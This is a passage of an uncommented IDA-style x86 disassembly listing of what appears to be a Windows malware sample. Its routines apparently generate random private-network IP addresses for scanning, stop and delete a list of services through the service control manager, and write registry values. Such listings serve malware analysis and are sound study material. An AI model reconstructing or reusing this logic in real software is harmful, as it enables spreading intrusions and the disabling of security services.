cmp al, 3
jnb short loc_43FEED
mov al, [ebp-135h]
mov [ebp-131h], al
loc_43FEED: ; CODE XREF: .data:0043FEC9�j
; .data:0043FEDF�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_43FF22
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push 404D49h
lea eax, [ebp-130h]
push eax
call sub_440905
add esp, 14h
loc_43FF22: ; CODE XREF: .data:0043FEF4�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_43FF7C
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_43FF7C
cmp al, 21h
jnb short loc_43FF7C
call sub_4408ED
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_43FF62
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_43FF62: ; CODE XREF: .data:0043FF5B�j
mov edi, edx
add edi, 10h
push edi
push 404D3Ch
lea edi, [ebp-130h]
push edi
call sub_440905
add esp, 14h
loc_43FF7C: ; CODE XREF: .data:0043FF2E�j
; .data:0043FF38�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_43FFBC
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_43FFBC
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push offset sub_404D2E
lea eax, [ebp-130h]
push eax
call sub_440905
add esp, 10h
loc_43FFBC: ; CODE XREF: .data:0043FF88�j
; .data:0043FF96�j
lea eax, [ebp-130h]
push eax
call sub_440591
cmp [ebp-10Ch], eax
jz loc_43FDFA
push dword ptr [ebp-10Ch]
call sub_44059D
movzx edi, word ptr ds:loc_404092+2
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_440905
add esp, 10h
loc_43FFFC: ; CODE XREF: .data:00440025�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_440005: ; CODE XREF: .data:0044000A�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440005
cmp eax, 19h
jz short loc_440027
push 404D25h
lea eax, [ebp-0FFh]
push eax
call sub_44091D
add esp, 8
jmp short loc_43FFFC
; ---------------------------------------------------------------------------
loc_440027: ; CODE XREF: .data:0044000F�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_440030: ; CODE XREF: .data:00440035�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440030
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_4408C9
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_440591
push esi
push ebx
push eax
call sub_43F725
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_4408B1
add esp, 4
jmp loc_43FDFA
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 5Bh
dd 4C2C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440080 proc near ; CODE XREF: .data:004400C2�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_440701
cmp eax, 80000000h
jb short loc_440097
mov eax, 3Ch
jmp short locret_4400B8
; ---------------------------------------------------------------------------
loc_440097: ; CODE XREF: sub_440080+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_4405E5
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_4400B3
mov eax, 12Ch
jmp short locret_4400B8
; ---------------------------------------------------------------------------
loc_4400B3: ; CODE XREF: sub_440080+2A�j
mov eax, 64h
locret_4400B8: ; CODE XREF: sub_440080+15�j
; sub_440080+31�j
leave
retn
sub_440080 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_440080
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push 401565h
push 0
push 0
call sub_440791
push eax
call sub_4406E9
xor esi, esi
jmp short loc_44011B
; ---------------------------------------------------------------------------
loc_4400E9: ; CODE XREF: .data:0044011D�j
lea eax, [ebp-4]
push eax
push 0
push 0
push 401E23h
push 0
push 0
call sub_440791
push eax
call sub_4406E9
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_4408B1
pop ecx
inc esi
loc_44011B: ; CODE XREF: .data:004400E7�j
cmp esi, ebx
jb short loc_4400E9
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_440126 proc near ; CODE XREF: sub_4403F5+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, loc_404A2F+9
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_440149: ; CODE XREF: sub_440126+211�j
push 0F003Fh
push 0
push 0
call sub_440839
mov [ebp+var_28], eax
or eax, eax
jz loc_440330
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_440845
mov ebx, eax
or eax, eax
jz loc_440328
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_440821
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_4401A1: ; CODE XREF: sub_440126+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_440821
or eax, eax
jz short loc_4401B7
cmp [ebp+var_1C], 1
jnz short loc_4401B9
loc_4401B7: ; CODE XREF: sub_440126+89�j
jmp short loc_4401CC
; ---------------------------------------------------------------------------
loc_4401B9: ; CODE XREF: sub_440126+8F�j
push 3E8h
call sub_44076D
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_4401A1
loc_4401CC: ; CODE XREF: sub_440126:loc_4401B7�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_4401EA
push ebx
call sub_44082D
loc_4401EA: ; CODE XREF: sub_440126+BC�j
push ebx
call sub_440815
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_440328
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_4402B0
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_4405F1
or eax, eax
jz short loc_4402B0
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_440249: ; CODE XREF: sub_440126+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_440249
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_44027D
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_44027D
push 404BA0h
lea eax, [ebp+var_36C]
push eax
call sub_44091D
add esp, 8
loc_44027D: ; CODE XREF: sub_440126+131�j
; sub_440126+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_44091D
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_44079D
loc_4402B0: ; CODE XREF: sub_440126+FE�j
; sub_440126+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_440328
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_440875
or eax, eax
jnz short loc_440328
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_440851
push [ebp+var_4]
call sub_440869
loc_440328: ; CODE XREF: sub_440126+62�j
; sub_440126+E0�j ...
push [ebp+var_28]
call sub_440815
loc_440330: ; CODE XREF: sub_440126+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_440149
pop edi
pop esi
pop ebx
leave
retn 4
sub_440126 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_4403D2
jg short loc_44035F
cmp eax, 2
jz short loc_4403C9
jmp loc_4403DF
; ---------------------------------------------------------------------------
loc_44035F: ; CODE XREF: .data:00440353�j
cmp eax, 113h
jnz short loc_4403DF
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43F364
mov eax, dword ptr ds:loc_404097+1
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43F2F9
add esp, 30h
push 0
push 404098h
call sub_440719
jmp short loc_4403F0
; ---------------------------------------------------------------------------
loc_4403C9: ; CODE XREF: .data:00440358�j
push 0
call sub_4407E5
jmp short loc_4403F0
; ---------------------------------------------------------------------------
loc_4403D2: ; CODE XREF: .data:00440351�j
push dword ptr ds:loc_402FFF+1
call sub_4407FD
jmp short loc_4403F0
; ---------------------------------------------------------------------------
loc_4403DF: ; CODE XREF: .data:0044035A�j
; .data:00440364�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_440809
loc_4403F0: ; CODE XREF: .data:004403C7�j
; .data:004403D0�j ...
pop edi
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4403F5 proc near ; CODE XREF: sub_4405FD+5C�p
var_2DC = byte ptr -2DCh
var_2D8 = byte ptr -2D8h
var_148 = dword ptr -148h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2DCh
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_8]
push offset sub_403010
call sub_440681
push 404B7Ch
lea eax, [ebp+var_143]
push eax
call sub_440905
and [ebp+var_44], 0
lea eax, sub_4023A7
mov [ebp+var_40], eax
and [ebp+var_3C], 0
and [ebp+var_38], 0
mov [ebp+var_34], edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
lea eax, [ebp+var_143]
mov [ebp+var_20], eax
lea eax, [ebp+var_44]
push eax
call sub_4407B5
push 0
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0CF0000h
push 404D25h
lea eax, [ebp+var_143]
push eax
push 0
call sub_4407F1
mov dword ptr ds:loc_402FFF+1, eax
call sub_4406C5
push eax
call sub_43F2D4
lea eax, [ebp+var_2D8]
push eax
push 2
call sub_440531
push 0
call sub_440126
lea eax, [ebp+var_2DC]
push eax
push 0
push 0
push 40211Dh
push 0
push 0
call sub_440791
push eax
call sub_4406E9
and [ebp+var_148], 0
push 4
push 4
lea eax, [ebp+var_148]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43F2F9
add esp, 24h
push 0
push 2710h
push 1
push dword ptr ds:loc_402FFF+1
call sub_4407A9
jmp short loc_440516
; ---------------------------------------------------------------------------
loc_440504: ; CODE XREF: sub_4403F5+132�j
lea eax, [ebp+var_1C]
push eax
call sub_4407CD
lea eax, [ebp+var_1C]
push eax
call sub_4407D9
loc_440516: ; CODE XREF: sub_4403F5+10D�j
push 0
push 0
push 0
lea eax, [ebp+var_1C]
push eax
call sub_4407C1
or eax, eax
jnz short loc_440504
pop edi
leave
retn 10h
sub_4403F5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440531 proc near ; CODE XREF: sub_4403F5+A5�p
jmp dword ptr ds:loc_40524C
sub_440531 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44053D proc near ; CODE XREF: .data:0043F5FB�p
jmp dword ptr ds:loc_40524D+3
sub_44053D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440549 proc near ; CODE XREF: .data:0043F5C8�p
jmp dword ptr ds:loc_40524D+7
sub_440549 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440555 proc near ; CODE XREF: .data:0043F4F6�p
; sub_43F725+651�p
jmp dword ptr ds:loc_405256+2
sub_440555 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440561 proc near ; CODE XREF: sub_43F725+1BA�p
jmp dword ptr ds:loc_405256+6
sub_440561 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44056D proc near ; CODE XREF: sub_43FD86+20�p
jmp dword ptr ds:loc_40525D+3
sub_44056D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440579 proc near ; CODE XREF: sub_43FD86+E�p
jmp dword ptr ds:loc_405263+1
sub_440579 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440585 proc near ; CODE XREF: .data:0043F5B6�p
; sub_43F725+197�p
jmp dword ptr ds:loc_405263+5
sub_440585 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440591 proc near ; CODE XREF: .data:0043FFC3�p
; .data:00440054�p
jmp dword ptr ds:loc_40526B+1
sub_440591 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44059D proc near ; CODE XREF: sub_43F725+63�p
; .data:0043FFDA�p
jmp dword ptr ds:loc_40526E+2
sub_44059D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405A9 proc near ; CODE XREF: .data:0043F5E6�p
jmp dword ptr ds:loc_405274
sub_4405A9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405B5 proc near ; CODE XREF: .data:0043F3D6�p
; sub_43F725+20B�p ...
jmp dword ptr ds:loc_405275+3
sub_4405B5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405C1 proc near ; CODE XREF: .data:0043F428�p
; .data:0043F464�p ...
jmp dword ptr ds:loc_40527A+2
sub_4405C1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405CD proc near ; CODE XREF: .data:0043F4EE�p
; sub_43F725+649�p
jmp dword ptr ds:loc_40527A+6
sub_4405CD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405D9 proc near ; CODE XREF: .data:0043F57F�p
; sub_43F725+48�p
jmp dword ptr ds:loc_405281+3
sub_4405D9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405E5 proc near ; CODE XREF: sub_440080+1D�p
jmp dword ptr ds:loc_40528F+1
sub_4405E5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4405F1 proc near ; CODE XREF: sub_440126+111�p
jmp dword ptr ds:loc_405299+3
sub_4405F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4405FD proc near ; CODE XREF: .data:0043F21C�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_4406B9
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_440631
push 22h
mov eax, edi
inc eax
push eax
call sub_440929
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_44064C
mov edi, eax
inc edi
jmp short loc_440629
; ---------------------------------------------------------------------------
loc_440628: ; CODE XREF: sub_4405FD+2F�j
inc edi
loc_440629: ; CODE XREF: sub_4405FD+29�j
cmp byte ptr [edi], 20h
jz short loc_440628
jmp short loc_44064C
; ---------------------------------------------------------------------------
loc_440630: ; CODE XREF: sub_4405FD+3E�j
inc edi
loc_440631: ; CODE XREF: sub_4405FD+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_44063D
cmp eax, 20h
jnz short loc_440630
loc_44063D: ; CODE XREF: sub_4405FD+39�j
jmp short loc_440640
; ---------------------------------------------------------------------------
loc_44063F: ; CODE XREF: sub_4405FD+4D�j
inc edi
loc_440640: ; CODE XREF: sub_4405FD:loc_44063D�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_44064C
cmp eax, 20h
jz short loc_44063F
loc_44064C: ; CODE XREF: sub_4405FD+24�j
; sub_4405FD+31�j ...
push 0
call sub_4406DD
push 1
push edi
push 0
push eax
call sub_4403F5
pop edi
leave
retn
sub_4405FD endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_440661 proc near ; CODE XREF: sub_43F725+8�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_440662: ; CODE XREF: sub_440661+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_440662
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_440661 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
db 0
; =============== S U B R O U T I N E =======================================
sub_440681 proc near ; CODE XREF: sub_4403F5+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_440681 endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406AD proc near ; CODE XREF: .data:0043F53C�p
jmp dword ptr ds:loc_4052A8
sub_4406AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406B9 proc near ; CODE XREF: sub_4405FD+5�p
jmp dword ptr ds:loc_4052A8+4
sub_4406B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406C5 proc near ; CODE XREF: sub_4403F5+91�p
jmp dword ptr ds:loc_4052B0
sub_4406C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406D1 proc near ; CODE XREF: .data:0043F544�p
jmp dword ptr ds:loc_4052B2+2
sub_4406D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406DD proc near ; CODE XREF: sub_4405FD+51�p
jmp dword ptr ds:loc_4052B2+6
sub_4406DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406E9 proc near ; CODE XREF: .data:0043F574�p
; .data:0043F618�p ...
jmp dword ptr ds:loc_4052B9+3
sub_4406E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4406F5 proc near ; CODE XREF: .data:0043FDCC�p
jmp dword ptr ds:loc_4052C0
sub_4406F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440701 proc near ; CODE XREF: sub_440080+4�p
jmp dword ptr ds:loc_4052C0+4
sub_440701 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44070D proc near ; CODE XREF: sub_43F2D4+1E�p
jmp dword ptr ds:loc_4052C7+1
sub_44070D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440719 proc near ; CODE XREF: .data:0043F512�p
; .data:004403C2�p
jmp dword ptr ds:loc_4052C7+5
sub_440719 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440725 proc near ; CODE XREF: .data:0043F4B6�p
jmp dword ptr ds:loc_4052CE+2
sub_440725 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440731 proc near ; CODE XREF: .data:0043F551�p
; .data:0043FDE4�p
jmp dword ptr ds:loc_4052CE+6
sub_440731 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44073D proc near ; CODE XREF: .data:0043F52E�p
jmp dword ptr ds:loc_4052D6+2
sub_44073D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440749 proc near ; CODE XREF: .data:0043F56E�p
jmp dword ptr ds:loc_4052D6+6
sub_440749 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440755 proc near ; CODE XREF: sub_43F017+13�p
jmp dword ptr ds:loc_4052DD+3
sub_440755 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440761 proc near ; CODE XREF: .data:0043F58C�p
; sub_43F725+17E�p
jmp dword ptr ds:loc_4052E4
sub_440761 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44076D proc near ; CODE XREF: .data:0043F4AA�p
; .data:0043F4E4�p ...
jmp dword ptr ds:loc_4052E4+4
sub_44076D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440779 proc near ; CODE XREF: sub_43F725+72�p
jmp dword ptr ds:loc_4052E4+8
sub_440779 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440785 proc near ; CODE XREF: sub_43F725+BB�p
; sub_43F725+D9�p ...
jmp dword ptr ds:loc_4052EE+2
sub_440785 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440791 proc near ; CODE XREF: .data:0043F612�p
; .data:004400DA�p ...
jmp dword ptr ds:loc_4052F3+1
sub_440791 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44079D proc near ; CODE XREF: sub_440126+185�p
jmp dword ptr ds:loc_4052F5+3
sub_44079D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407A9 proc near ; CODE XREF: sub_4403F5+108�p
jmp dword ptr ds:loc_405302+2
sub_4407A9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407B5 proc near ; CODE XREF: sub_4403F5+60�p
jmp dword ptr ds:loc_405308
sub_4407B5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407C1 proc near ; CODE XREF: sub_4403F5+12B�p
jmp dword ptr ds:loc_405309+3
sub_4407C1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407CD proc near ; CODE XREF: sub_4403F5+113�p
jmp dword ptr ds:loc_405310
sub_4407CD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407D9 proc near ; CODE XREF: sub_4403F5+11C�p
jmp dword ptr ds:loc_405311+3
sub_4407D9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407E5 proc near ; CODE XREF: .data:004403CB�p
jmp dword ptr ds:loc_405318
sub_4407E5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407F1 proc near ; CODE XREF: sub_4403F5+87�p
jmp dword ptr ds:loc_40531A+2
sub_4407F1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4407FD proc near ; CODE XREF: .data:004403D8�p
jmp dword ptr ds:loc_405320
sub_4407FD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440809 proc near ; CODE XREF: .data:004403EB�p
jmp dword ptr ds:loc_405320+4
sub_440809 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440815 proc near ; CODE XREF: sub_440126+C5�p
; sub_440126+205�p
jmp dword ptr ds:loc_40532D+3
sub_440815 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440821 proc near ; CODE XREF: sub_440126+6F�p
; sub_440126+82�p
jmp dword ptr ds:loc_405332+2
sub_440821 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44082D proc near ; CODE XREF: sub_440126+BF�p
jmp dword ptr ds:loc_405337+1
sub_44082D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440839 proc near ; CODE XREF: sub_440126+2C�p
jmp dword ptr ds:loc_405339+3
sub_440839 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440845 proc near ; CODE XREF: sub_440126+59�p
jmp dword ptr ds:loc_405340
sub_440845 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440851 proc near ; CODE XREF: sub_440126+1F5�p
jmp dword ptr ds:loc_405340+4
sub_440851 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44085D proc near ; CODE XREF: sub_43F2F9+21�p
jmp dword ptr ds:loc_405347+1
sub_44085D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440869 proc near ; CODE XREF: sub_43F2F9+4B�p
; sub_43F364+40�p ...
jmp dword ptr ds:loc_405347+5
sub_440869 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440875 proc near ; CODE XREF: sub_43F364+16�p
; sub_440126+1D1�p
jmp dword ptr ds:loc_405350
sub_440875 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440881 proc near ; CODE XREF: sub_43F364+36�p
jmp dword ptr ds:loc_405350+4
sub_440881 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_44088D proc near ; CODE XREF: sub_43F2F9+41�p
jmp dword ptr ds:loc_405355+3
sub_44088D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_440899 proc near ; CODE XREF: sub_43F239+15�p
jmp dword ptr ds:loc_405363+1
sub_440899 endp
; ---------------------------------------------------------------------------
